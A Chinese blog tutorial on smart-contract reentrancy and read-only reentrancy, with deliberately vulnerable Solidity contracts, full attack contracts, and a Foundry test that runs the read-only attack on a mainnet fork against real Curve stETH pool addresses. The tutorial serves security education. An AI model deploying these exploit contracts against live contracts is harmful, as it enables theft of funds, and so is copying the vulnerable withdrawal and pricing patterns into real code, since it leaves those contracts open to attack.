区块链安全常见的攻击——重入漏洞(Reentrancy Vulnerability)和 只读重入漏洞(Read-Only Reentrancy Vulnerability)【4】

已于 2024-12-25 15:20:58 修改
阅读量499 收藏 3
点赞数 4
文章标签: 区块链 安全
于 2024-11-20 16:30:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_43458715/article/details/143917420
版权

区块链安全常见的攻击——重入漏洞(Reentrancy Vulnerability)和 只读重入漏洞(Read-Only Reentrancy Vulnerability)

区块链安全常见的攻击合约和简单复现,附带详细分析——重入漏洞(Reentrancy Vulnerability)和 只读重入漏洞(Read-Only Reentrancy Vulnerability)【4】

1、重入漏洞(Reentrancy Vulnerability)

1.1 漏洞合约

contract EtherStore {
    mapping(address => uint256) public balances; // 用户余额映射

    // 存款函数
    function deposit() public payable {
        balances[msg.sender] += msg.value; // 更新存款金额
    }

    // 提款函数(存在漏洞)
    function withdrawFunds(uint256 _weiToWithdraw) public {
        require(balances[msg.sender] >= _weiToWithdraw); // 确保余额足够
        (bool send, ) = msg.sender.call{value: _weiToWithdraw}(""); // 发送以太币
        require(send, "send failed"); // 检查转账是否成功

        // 检查余额后再扣减(避免下溢)
        if (balances[msg.sender] >= _weiToWithdraw) {
            balances[msg.sender] -= _weiToWithdraw; // 更新余额
        }
    }
}

1.2 漏洞分析

漏洞的根源在于 withdrawFunds 函数,该函数在更新用户余额之前将 Ether 转账给攻击者。这样就使得用户可以多次调用withdrawFunds 函数,在更新用户余额之前。
在这里插入图片描述

1.3 攻击分析

  1. 写一个攻击合约,合约有receive()函数,函数可以循环调用withdrawFunds
    在这里插入图片描述
  2. 攻击者先存储 1 以太币 在漏洞合约
    在这里插入图片描述
  3. 调用漏洞合约(store)的withdrawFunds函数
    在这里插入图片描述
    在这里插入图片描述
  4. 漏洞合约的withdrawFunds函数 会将以太币发送给调用者(攻击者),同时会触发攻击合约的 receive函数,不断重入攻击调用withdrawFunds函数,直到漏洞合约的金额小于1 ether
    在这里插入图片描述
    在这里插入图片描述

1.4 攻击合约

contract AttackReentrancy is Test {
    EtherStore store; // 目标合约实例

    constructor(address _store) {
        store = EtherStore(_store); // 初始化目标合约地址
    }

    function attack() public {
        // 在漏洞合约 存储 1 ether
        console.log("init Attack contract balance", address(store).balance); // 打印合约余额
        store.deposit{value: 1 ether}();
        console.log(
            "after deposit, Attack contract balance",
            address(store).balance
        );
        store.withdrawFunds(1 ether);
        console.log("after attack, contract balance", address(store).balance);
    }

    receive() external payable {
        console.log(
            "Cycle out withdrawFunds until the amount of the store contract < 1 ether, store balance: ",
            address(store).balance
        );
        if (address(store).balance >= 1 ether) {
            store.withdrawFunds(1 ether); // exploit here
        }
    }
}

在这里插入图片描述

2、只读重入漏洞(Read-Only Reentrancy Vulnerability)

2.1 漏洞合约

interface ICurve {
    function get_virtual_price() external view returns (uint);

    function add_liquidity(
        uint[2] calldata amounts,
        uint min_mint_amount
    ) external payable returns (uint);

    function remove_liquidity(
        uint lp,
        uint[2] calldata min_amounts
    ) external returns (uint[2] memory);

    function remove_liquidity_one_coin(
        uint lp,
        int128 i,
        uint min_amount
    ) external returns (uint);
}

address constant STETH_POOL = 0xDC24316b9AE028F1497c275EB9192a3Ea0f67022;
address constant LP_TOKEN = 0x06325440D014e39736583c165C2963BA99fAf14E; //steCRV Token

// VulnContract
// users stake LP_TOKEN
// getReward rewards the users based on the current price of the pool LP token
contract VulnContract {
    IERC20 public constant token = IERC20(LP_TOKEN);
    ICurve private constant pool = ICurve(STETH_POOL);

    mapping(address => uint) public balanceOf;

    function stake(uint amount) external {
        token.transferFrom(msg.sender, address(this), amount);
        balanceOf[msg.sender] += amount;
    }

    function unstake(uint amount) external {
        balanceOf[msg.sender] -= amount;
        token.transfer(msg.sender, amount);
    }

    function getReward() external view returns (uint) {
        //rewarding tokens based on the current virtual price of the pool LP token
        uint reward = (balanceOf[msg.sender] * pool.get_virtual_price()) /
            1 ether;
        // Omitting code to transfer reward tokens
        return reward;
    }
}

2.2 漏洞分析

攻击的核心在于目标合约 (target) 中的 getReward() 函数,它是一个只读(view)函数,用于计算奖励。
在调用 Curve 池的 remove_liquidity 函数时,攻击合约的 receive 函数会被触发。攻击者在 receive 函数中调用了目标合约的 getReward(),实现了只读重入。
在这里插入图片描述

在这里插入图片描述

2.3 攻击分析

1.添加流动性(add_liquidity)
uint[2] memory amounts = [add_lq_value, 0];
uint lp = pool.add_liquidity{value: add_lq_value}(amounts, 1);

攻击者向 Curve 池添加了大量流动性(100,000 Ether),以生成 LP 代币并改变池子的 virtual_price(虚拟价格)。
添加流动性后,LP 代币的价格可能会上升。

2. 获取添加流动性后的虚拟价格
console.log("PRICE: LP token price before remove_liquidity()", pool.get_virtual_price());

记录流动性操作后池子的虚拟价格,为后续对比提供基准。

3. 移除流动性(remove_liquidity)
pool.remove_liquidity(lp, min_amounts);

攻击者将刚才的流动性移除,导致池子的虚拟价格发生变化(可能下降)。
Curve 池在移除流动性时会返还以太币,从而触发攻击合约的 receive 函数。

4. 重入攻击在 receive 函数中触发
receive() external payable {
    console.log("LP token price during remove_liquidity()", pool.get_virtual_price());
    uint reward = target.getReward();
    console.log("Reward during remove_liquidity: ", reward);
}

当 Curve 池的 remove_liquidity 转账触发 receive 回调时,攻击合约调用目标合约的 getReward()。
此时的 getReward() 计算奖励时,会读取被操控后的虚拟价格,导致奖励值不准确。重入攻击成功操控了奖励逻辑。

5 对比前后状态
console.log("Reward after remove_liquidity: ", reward);

在移除流动性后的正常逻辑中再次调用 getReward(),记录未重入时的奖励值。
通过对比,发现重入后奖励值因虚拟价格的操控而被放大。

在这里插入图片描述

2.4 攻击合约

// 攻击合约
contract ExploitContract {
    ICurve private constant pool = ICurve(STETH_POOL); // Curve 池子地址
    IERC20 public constant lpToken = IERC20(LP_TOKEN); // LP 代币地址
    VulnContract private immutable target; // 漏洞合约地址

    constructor(address _target) {
        target = VulnContract(_target); // 初始化漏洞合约
    }

    // 将 LP 代币存入漏洞合约
    function stakeTokens() external payable {
        uint add_lq_value = 10 ether;
        uint[2] memory amounts = [add_lq_value, 0]; // 添加流动性
        console.log("virtual_price:", pool.get_virtual_price());
        console.log("the first time 11 add_liquidity...");
        uint lp = pool.add_liquidity{value: add_lq_value}(amounts, 1);
        console.log("virtual_price: ", pool.get_virtual_price());

        lpToken.approve(address(target), lp); // 授权漏洞合约操作 LP 代币
        target.stake(lp); // 存入漏洞合约
    }

    // 执行只读重入攻击
    function performReadOnlyReentrnacy() external payable {
        uint add_lq_value = 100000 ether;
        uint[2] memory amounts = [add_lq_value, 0]; // 添加流动性
        console.log("the second time 22 add_liquidity...");
        uint lp = pool.add_liquidity{value: add_lq_value}(amounts, 1);

        console.log("virtual_price: ", pool.get_virtual_price());
        uint reward = target.getReward(); // 获取奖励
        console.log("Reward before remove_liquidity: ", reward);

        console.log("start remove_liquidity attack !!!");
        uint[2] memory min_amounts = [uint(0), uint(0)];
        pool.remove_liquidity(lp, min_amounts); // 移除流动性,触发 receive 函数

        console.log(
            "--------------------------------------------------------------------"
        );
        console.log("virtual_price: ", pool.get_virtual_price());
        console.log("get Reward ...");
        reward = target.getReward(); // 获取奖励
        console.log("Reward after remove_liquidity: ", reward);
    }

    // 回退函数 - 利用重入攻击
    receive() external payable {
        console.log(
            "--------------------------------------------------------------------"
        );
        console.log("virtual_price: ", pool.get_virtual_price());
        console.log("receive() get Reward ...");
        uint reward = target.getReward(); // 攻击时获取奖励
        console.log("Reward during remove_liquidity: ", reward);
    }
}

// 测试合约
contract ExploitTest is Test {
    ExploitContract public hack; // 攻击合约
    VulnContract public target; // 漏洞合约

    function setUp() public {
        vm.createSelectFork("mainnet"); // 使用主网分叉
        target = new VulnContract(); // 部署漏洞合约
        hack = new ExploitContract(address(target)); // 部署攻击合约
    }

    function testPwn() public {
        vm.deal(address(hack), 1000010 ether);
        hack.stakeTokens(); // 存入 Ether
        hack.performReadOnlyReentrnacy(); // 执行攻击
    }
}

在这里插入图片描述

koko爱英语
关注
CVE-2022-0847(脏管道、提权内核漏洞)
墨痕诉清风的博客
06-22 4405
摘要 CVE-2022-0847它是自 5.8 以来 Linux 内核中的一个漏洞,它允许覆盖任意只读文件中的数据。这会导致权限提升,因为非特权进程可以将代码注入根进程。它类似于 Dirty COW (CVE-2016-5195),但更容易被利用。内核影响版本:5.8 ...............
CVE-2022-0847 Linux脏管道漏洞分析
qq_42735101的博客
01-26 1161
CVE-2022-0847漏洞被一名叫Max Kellermann的安全研究员于2022年3月7日公开披露,并将该漏洞命名为The Dirty Pipe Vulnerability(脏管道漏洞)。
区块链安全问题(乱序时间戳,重入攻击
不思量
11-11 7108
在引入比特币等加密货币时,一个经常提及的概念是支撑着这些加密货币的底层框架——区块链协议非常地安全可靠。各种加密算法保证了区块链的正常运行,区块链中的信息不可篡改、不能删除,基于工作量的证明保证难以有攻击者可以控制网络。在这些良好性质的支持下,加密货币系统得到了快速的发展。 但是,对加密货币的绝对安全的期望是错误的。接下来,我们将看一些具体的例子,查看其中加密货币系统是如何被攻击的。第一个例子,攻...
对抗粉尘攻击——CashShuffle正在保护BCHer隐私
weixin_33878457的博客
04-01 345
自最近混币服务(CashShuffle)上线Electron Cash钱包后,社区再次点燃起讨论粉尘攻击(Dust Attack)的热潮。粉尘攻击使得BCH用户匿名性遭到致命打击,那么BCHer应该如何对抗粉尘攻击保护自己隐私呢? 什么是粉尘攻击 粉尘攻击(Dusting Attack)是最近兴起的一种去匿名化攻击方法,黑客在使用这项攻击来获得用户身份,然后通过用户隐私来威胁用户,一些不愿意暴露...
剖析区块链技术现存漏洞及应对建议
最新发布
2501_91539726的博客
04-06 499
在未来的研究实践中,还需要持续关注区块链技术的安全问题,不断探索新的安全技术解决方案,以推动区块链技术的健康发展。如果攻击者能够入侵节点,获取节点的控制权,就有可能篡改节点存储的数据,或者向区块链网络中注入恶意数据,破坏整个区块链系统的完整性。此外,建立智能合约的升级机制,当发现严重漏洞时,能够在一定条件下对智能合约进行安全升级,保障用户的权益。同时,建立私钥备份恢复机制,确保用户在私钥丢失的情况下能够安全地恢复对资产的控制权,但要注意备份恢复过程中的安全性,防止私钥泄露。区块链技术现存漏洞剖析。
区块链漏洞总结
SHELLCODE_8BIT的博客
07-16 298
1.2.3.4.
区块链漏洞平台的漏洞信息
weixin_30872337的博客
08-13 388
漏洞信息 https://dvpnet.io/lddt https://www.bugx.io/claim http://blockchain.seebug.org/ 安全报告 https://www.mcafee.com/enterprise/en-us/assets/reports/rp-blockchain-security-risks.pdf https://www.freebu...
区块链安全常见攻击——整数溢出漏洞(Integrate Overflow) 代币溢出漏洞(Token Whale Overflow)【1】
weixin_43458715的博客
11-18 344
区块链安全常见攻击合约简单复现,附带详细分析——整数溢出漏洞(Integrate Overflow)【1】
常见漏洞及防范措施(总结篇)
qq_69100706的博客
11-29 1149
CSRF(Cross-Site Request Forgery,跨站请求伪造)是一种安全漏洞攻击者通过这种漏洞可以利用受害者在已登录的网站上的身份认证信息,在不知情的情况下执行非预期的操作。与XSS(跨站脚本攻击)不同的是,XSS是利用站点内的信任用户,而CSRF则是通过伪装成受信任用户向受信任的网站发送请求SSRF(Server-Side Request Forgery,服务器端请求伪造)是一种安全漏洞攻击者通过构造恶意的URL或其他形式的数据,诱使服务器向攻击者指定的内部或外部系统发起请求。
【Android安全】insecureshop漏洞挖掘-
tyty2211的博客
11-21 156
insecureshop使用的net.gotev.uploadservice版本是3.2.3,为什么这里poc中不用3.2.3呢,因为现在这个版本不可用,相邻版本只有3.33.2.1,由于3.3版本与3.2.3某些实现方法不同,这里使用3.2.1版本。权限: 对于 s3.list_buckets() 操作,用户需要拥有 s3:ListAllMyBuckets 权限,以及对资源 arn:aws:s3::😗 的权限。用途: 通常用于获取账户中存在的 S3 存储桶的概览,了解存储桶的名称、创建日期等信息。
大白话图解 Linux 脏管道(Dirty Pipe) 漏洞(CVE-2022-0847)
热门推荐
omgFuture的博客
03-08 1万+
大白话图解 Linux 脏管道(Dirty Pipe) 漏洞(CVE-2022-0847) 漏洞披露链接:https://dirtypipe.cm4all.com/ 背景 ​ 今天(2022年3月8日),开源社区爆出了Linux内核新的一级安全漏洞, Dirty Pipe Vulnerability. 漏洞点于Linux内核5.8版本引入,可以’通杀’后续多个版本内核,以及所有使用了相关Linux内核的下游厂商产品。当然,有必要说明的是,这里的通杀不是针对任意系统的远程命令执行,而是面向内
深入了解区块链漏洞之1:介绍篇
DongAoTony的博客
03-20 3656
大家都知道,区块链作为最近涌现出来的技术,其具有去中心化的特质,以及拥有加密货币属性智能合约功能,让许多人都看好它,把它当作人类下一代IT革命的引擎技术。但是,区块链本质上是一款去中心化的超级账本软件,因此它不可避免地会存在软件上的漏洞。目前关于区块链的研究,大都聚焦在基于该技术智能合约具体的应用上面,包括关于区块链安全方面也主要在合约应用,而关于其底层系统级的安全漏洞则少有涉猎。这里,我们将针对具有代表性的区块链(比特币、以太坊等),探究区块链可能存在的系统漏洞
区块链攻击方式总结二
Leon~博客
03-13 5236
一、总述 当我们强调区块链上的数据难以篡改、去中心化特性时,区块链攻击也是无时不在的。在区块链的Token经济下,智能合约漏洞、黑客攻击攻击方式层出不穷。这些攻击来自很多地方,不仅仅是区块链本身的不完善,还包括一些钓鱼网站、对交易所的DDoS攻击、欺骗等手段。 转存失败重新上传取消 目前对区块链攻击分为三个维度: (1)双花问题,就是一笔钱花了两次。传统的互联网是无法避免双花的。...
区块链 攻击类型 汇总
软件工程小施同学 的专栏
05-29 2368
基于对等网络(P2P)的攻击 1、日蚀攻击(Eclipse attack)- 一个节点将选择“x”个节点作为访问区块链的基础,该节点从这“x”个节点获取区块链的数据。 如果攻击者可以使得此节点选择的“x”个节点都为攻击者可控制的节点,就可以使得被攻击节点处在一个“孤立”的状态。被攻击节点将从主网中被隔离出来,完全由攻击者控制。 如下图所示: 图一 2、女巫攻击- 这里的“女巫”并不是指拥有魔法的女人,而是出自一部美国电影《Sybil》,剧中的主人公拥有16重人格,扮演着16个不同的角色。而女巫
区块链攻击向量:最安全技术的漏洞(下)
2301_77157449的博客
04-17 313
导语:区块链并不像我们想象的那么安全
区块链黑客第一讲:重入攻击
weixin_52628792的博客
10-29 2011
区块链骇客专栏第一章,智能合约安全审计必练!
区块链智能合约的安全漏洞解析
2501_91226673的博客
03-27 336
``html 区块链智能合约的安全漏洞解析。
CSA发布 | 《区块链的十大攻击漏洞及弱点》
CCSA2018的博客
04-29 2573
关注微信公众号:云安全联盟CSA ",回复关键词“区块链十大攻击” 即可阅读下载全文 目前市场上对区块链有一种普遍的误解是,用户会认为分布式账本技术 (DLT)系统的不可篡改性区块链技术的加密性使得其天生安全的。但实际上,针对区块链应用程序的攻击途径广泛存在,且每次发生,都会造成巨大的损失。 CSA发布《区块链的十大攻击漏洞及弱点》,本报告覆盖了针对加密货币DLT的十大攻击类型,提供了说明性示例代价高昂的教训,可以指导帮助开发人员、合规官、使用加密货币的用户如何避免陷入相同的陷阱。 交易所黑.
Vulnerability-and-Attack-Injector:PHP漏洞攻击自动化工具
根据提供的文件信息,我们将从标题、描述标签中提取知识点,详细说明“Vulnerability-and-Attack-Injector:漏洞攻击者”工具的相关知识点。 ### 标题知识点 - **漏洞攻击注入程序**: 标题中提到的“漏洞...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值